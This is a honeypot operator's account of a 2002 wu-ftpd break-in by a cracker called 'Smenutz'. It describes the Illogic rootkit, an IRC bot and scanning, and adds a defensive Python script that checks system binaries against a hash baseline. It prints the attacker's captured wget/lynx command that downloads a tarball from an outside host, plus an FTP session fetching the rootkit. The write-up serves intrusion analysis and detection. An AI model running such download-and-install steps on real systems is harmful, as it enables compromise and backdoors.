Smenutz

On November 9th, 2002 at 10:39:15, somebody came barging through my wu-ftpd's door. A file was fetched:

echo 1 ; if [ -f /usr/bin/wget ] ; then /usr/bin/wget http://diablows.org/gold.tgz ; else if [ -f /usr/bin/lynx ] ; then /usr/bin/lynx -dump http://diablows.org/gold.tgz >> gold.tgz ; fi ; fi ; fi

A few minutes later the same somebody came back and fetched a file called "rk.tar.gz" from an FTP site:

ftp 209.171.43.x
linuxu
*censored*
bin
hash
prompt
cd www
ls
get rk.tar.gz
Name (209.171.43.x:root): Hash mark printing on (1024 bytes/hash mark).

With a simple "./setup password", the Illogic rootkit is installed. It backs up the sane versions of all kinds of binaries, copies trojaned versions of those binaries over the defaults, installs a sniffer, cleans the logs and mails the system configuration to a Hotmail account. A trojaned sshd is also launched as a backdoor.
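
The rootkit step that matters most for a defender is the quiet replacement of system binaries, so here is an added example of the check that catches it: a hash-and-permission baseline taken from known-good media, verified later against the live files. This is my own illustration, not code from the original post and not part of the Illogic rootkit or of any tripwire-style product; the file names and the tampering scenario in demo() are constructed in a temporary directory so the script runs offline.

```python
"""Baseline-and-verify check for swapped system binaries (added example)."""
import hashlib
import json
import os
import stat
import tempfile


def sha256_of(path, chunk=65536):
    """Stream the file so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def take_baseline(paths):
    """Record hash, size and permission bits of every regular file in paths.

    Take this from known-good media (rescue disk, fresh install) before the
    host is exposed; a baseline taken after compromise only memorises the
    trojans.
    """
    baseline = {}
    for p in paths:
        st = os.lstat(p)
        if not stat.S_ISREG(st.st_mode):
            continue  # symlinks and devices are not what gets swapped here
        baseline[p] = {
            "sha256": sha256_of(p),
            "size": st.st_size,
            "mode": stat.S_IMODE(st.st_mode),
        }
    return baseline


def save_baseline(baseline, path):
    """Store the baseline off-host; a copy on the box is a rootkit's to edit."""
    with open(path, "w") as f:
        json.dump(baseline, f, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def verify(baseline):
    """Compare live files against the baseline; return {path: [reasons]}.

    Reasons: 'missing', 'content' (hash differs or no longer a regular
    file), 'mode' (permission bits differ), 'setuid' (a setuid/setgid bit
    appeared that the baseline did not have).
    """
    findings = {}
    for p, rec in baseline.items():
        reasons = []
        try:
            st = os.lstat(p)
        except FileNotFoundError:
            findings[p] = ["missing"]
            continue
        if not stat.S_ISREG(st.st_mode) or sha256_of(p) != rec["sha256"]:
            reasons.append("content")
        mode = stat.S_IMODE(st.st_mode)
        if mode != rec["mode"]:
            reasons.append("mode")
            if (mode & ~rec["mode"]) & (stat.S_ISUID | stat.S_ISGID):
                reasons.append("setuid")
        if reasons:
            findings[p] = reasons
    return findings


def demo():
    """Constructed scenario: two fake binaries, one replaced like the rootkit does."""
    with tempfile.TemporaryDirectory() as d:
        ls, sshd = os.path.join(d, "ls"), os.path.join(d, "sshd")
        for p in (ls, sshd):
            with open(p, "wb") as f:
                f.write(b"\x7fELF original " + os.path.basename(p).encode())
            os.chmod(p, 0o755)
        baseline = take_baseline([ls, sshd])
        clean = verify(baseline)  # nothing touched yet, expect {}
        # Mimic the rootkit: keep a backup of the sane binary, drop a different
        # file over it, and add a setuid bit.
        os.rename(sshd, sshd + ".bak")
        with open(sshd, "wb") as f:
            f.write(b"\x7fELF replaced sshd (constructed sample)")
        os.chmod(sshd, 0o4755)
        tampered = {os.path.basename(p): r for p, r in verify(baseline).items()}
        return clean, tampered


if __name__ == "__main__":
    print(demo())  # ({}, {'sshd': ['content', 'mode', 'setuid']})
```

Hashes alone are not enough against a rootkit that also hides files from the userland tools, which is why the baseline should be stored and the verification run from outside the suspect system (a rescue boot or a second host mounting the disk read-only).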

A few minutes later the cracker logs in on his trojaned sshd to fetch some more files. First he fetches "aw.tgz" from Geocities. This file offers some FTP scanning and exploiting tools. Not really interesting.

After scanning a /16 with "awu", the cracker goes on to get a bot running on an IRC network. It's an "Energy Mech" bot this time. He hooks it up to Undernet to join a little channel of his and a trivia channel. Apparently the cracker is named "smenutz". He's a Romanian dude (of course). He logs in on a freshly cracked system, not knowing it's a honeypot, with PuTTY, a Windows SSH client (and more). Fat chance it's his home box. Not much intelligence in this kiddie.

Since Smenutz needs to "pwn" more boxes, he starts scanning for wu-ftpd for a while. Although I limit such scans to a mere few bytes/s, they still annoy me. Since this kid only talks Romanian (which I do not understand) and doesn't seem to be all that interesting, I disconnect the system from the network.

This hack wasn't really exciting in any way. Although Smenutz does have some nice exploits for all kinds of services (sshd, telnetd, some ftpds, rpc, openssl, etc.), the old "crack_wuftpd, install_irc_bot, crack_other_wuftpds" routine has become boring, to me at least. I'm wondering if there's a way to learn a lot and have fun at the same time with a honeypot.